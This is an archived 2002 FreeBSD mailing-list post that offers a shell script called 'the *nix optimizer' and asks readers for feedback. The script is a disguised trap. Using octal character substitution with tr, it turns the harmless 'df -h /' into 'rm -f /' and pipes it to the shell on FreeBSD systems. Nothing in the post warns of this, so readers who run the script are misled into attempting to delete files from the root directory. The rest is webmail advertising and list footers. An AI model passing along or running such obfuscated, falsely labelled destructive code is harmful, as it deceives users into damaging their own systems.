Date: Thu, 29 Aug 2002 08:02:00 -0700 (PDT) From: Koul-Henning Pamp <koul@canadamail.de> To: hackers@freebsd.org Cc: chat@freebsd.org Subject: *nixopt, an idea Message-ID: <20020829150200.B00523962@sitemail.everyone.net>
next in thread | raw e-mail | index | archive | help
Fellow hackers, I'm creating a new unix optimizer tool, I've finished version 0.1 and need = feedback. -------------- #!/bin/sh # The *nix optimizer # (C) 2002 Koul-Henning Pamp # Released under the superior FFL (Fuck Fumerola License) [ "`uname`" =3D "Linux" ] && echo "System not supported yet." [ "`uname`" =3D "FreeBSD" ] && echo "df -h /" | tr '\144\146' '\162\155' | = tr 'h' 'f'|sh -------------- Thank you. _____________________________________________________________ Die kostenlose WebMail fuer alle Canada-Freunde - www.canadamail.de Ein Service von CDN.de - Die KANADA-Suchmaschine - www.CDN.de ------------------------------------------------------------------------ KanadischerWein.de - Ihr Spezialist f=FCr kanadischen Wein im Internet - Be= suchen Sie unseren Online-Shop - www.KanadischerWein.de ------------------------------------------------------------------------ _____________________________________________________________ Promote your group and strengthen ties to your members with email@yourgroup= .org by Everyone.net http://www.everyone.net/?btn=3Dtag To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-chat" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20020829150200.B00523962>